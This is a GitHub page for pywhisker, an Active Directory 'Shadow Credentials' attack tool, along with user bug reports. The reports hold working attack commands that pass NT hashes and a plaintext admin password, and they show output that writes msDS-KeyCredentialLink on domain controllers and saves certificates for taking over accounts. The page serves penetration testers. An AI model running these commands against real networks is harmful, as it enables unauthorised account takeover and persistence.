shutdownrepo / pywhisker
Python version of the C# tool for "Shadow Credentials" attacks
License: GNU General Public License v3.0
It would be awesome to have pipx support for this useful package so it's even easier to deal with Python virtual envs. To make it work the setup.py or pyproject.toml file is needed as per docs https://pipx.pypa.io/latest/how-pipx-works/.
While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?
pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
However I was able to add shadow credentials as the domain admin:
pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
I also checked for any existing shadow credentials for the targeted computer account but there weren't any.
Hi. Thank you very much for your time writing this tool!
I can successfully add shadow credentials when authenticating using a plaintext password but when I try the same using Kerberos authentication on the same machine in the same "session" it fails with "invalid server address". I have tested all kinds of variations of the parameters such as "-d [domain]" and "--dc-ip [DC IP]" in various locations of the command but I always get the same error. Note that I have no issues using for example Impacket's secretsdump script with Kerberos in the same environment.
I also noted that you have not used the "-k" parameter in any of your examples here so I cannot check my command against an example.
Thank you for this great Python port! The README has not been updated to include the --action spray. I swore that the tool supported it, but couldn't find it until I read the PRs: #6
This addition would help others realize faster that this tool supports this great feature like the C# ShadowSpray tool.
Hi,
Thank you for this tool.
During testing of the new cross-domain shadow credential writing I encountered an issue. As you can see in the pictures, adlab.local\adlab_shadow1 has full control of child.adlab.local\child_domainuser1 but still the writing of shadow credentials fails due to insufficient rights. I have no issues writing shadow credentials within a domain.
The trust involved is a parent-child trust where adlab.local is the parent domain and child.adlab.local is the child domain.
When I need to generate a certificate from domainA.contoso.local to target victimuser in domainB.contoso.local, I use the NT hash for authentication with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.local
All fine.
But in my case LDAP signing + channel binding is enabled in domainB, and I can't authenticate with NTLM, because I get the error strongerAuthRequired.
And when I request a ticket for [email protected] and then use this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.local
I get the error KDC_ERR_WRONG_REALM.
I know that this version of ldap3 can solve this problem https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm.
I tried to do it myself, but I couldn't succeed.